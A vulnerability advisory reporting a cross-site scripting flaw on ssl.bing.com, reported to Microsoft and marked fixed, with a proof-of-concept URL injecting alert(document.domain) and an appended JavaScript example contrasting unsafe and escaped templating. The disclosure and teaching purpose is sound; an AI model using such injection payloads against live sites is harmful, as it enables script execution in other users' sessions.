SSCHADV2013-012 - ssl.bing.com - Cross-site Scripting vulnerability
Advisory: ssl.bing.com – Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-012
Author: Stefan Schurtz
Affected Software: Successfully tested on ssl.bing.com
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
The website ‘ssl.bing.com’ is prone to a Cross-site Scripting vulnerability.
======================
PoC-Exploit
======================
https://ssl.bing.com/webmaster/home/mysites?orde=1&url=http%3A%2F%2Fstefanschurtz.de%2Ff5018%27-alert%28document.domain%29-%27207aac89df6
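Added example, not part of the original advisory: the quote-delimited payload in the `url` parameter above is the shape that breaks out of a single-quoted JavaScript string, so this sketch renders the decoded value both with raw concatenation and with JavaScript string encoding. The reflection context, the template, and the names `siteUrl`, `renderUnsafe`, `renderSafe` and `jsStringLiteral` are assumptions for illustration; the advisory does not describe the server-side code.

```javascript
// Added example (not from the advisory). Assumption: the page placed the
// decoded `url` query parameter inside a single-quoted JavaScript string.
const POC_QUERY =
  "orde=1&url=http%3A%2F%2Fstefanschurtz.de%2Ff5018%27-alert%28document.domain%29-%27207aac89df6";

// Decode the parameter the way a web framework does before templating.
function decodedUrlParam(query) {
  return new URLSearchParams(query).get("url");
}

// Vulnerable pattern (hypothetical template): raw concatenation into a
// single-quoted string lets a ' in the value end the literal early.
function renderUnsafe(value) {
  return "var siteUrl = '" + value + "';";
}

// Hardened pattern: emit a JS string literal and additionally escape the
// characters that are significant inside an HTML <script> block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

function renderSafe(value) {
  return "var siteUrl = " + jsStringLiteral(value) + ";";
}

// Run a rendered statement with a stubbed alert() and a fake document, and
// report whether the value caused a function call (i.e. code execution).
function executesInjectedCall(statement) {
  let called = false;
  const alertStub = () => { called = true; return 0; };
  new Function("alert", "document", statement)(alertStub, { domain: "example.test" });
  return called;
}

const value = decodedUrlParam(POC_QUERY);
console.log(renderUnsafe(value), "-> executes:", executesInjectedCall(renderUnsafe(value)));
console.log(renderSafe(value), "-> executes:", executesInjectedCall(renderSafe(value)));
```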
======================
Disclosure Timeline
======================
29-Dec-2013 – informed Microsoft Security Response Center
30-Dec-2013 – feedback from Microsoft Security Response Center
31-Dec-2013 – status update from Microsoft Security Response Center
03-Jan-2014 – status update from Microsoft Security Response Center
24-Jan-2014 – informed by MSRC about fix
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.microsoft.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-012.txt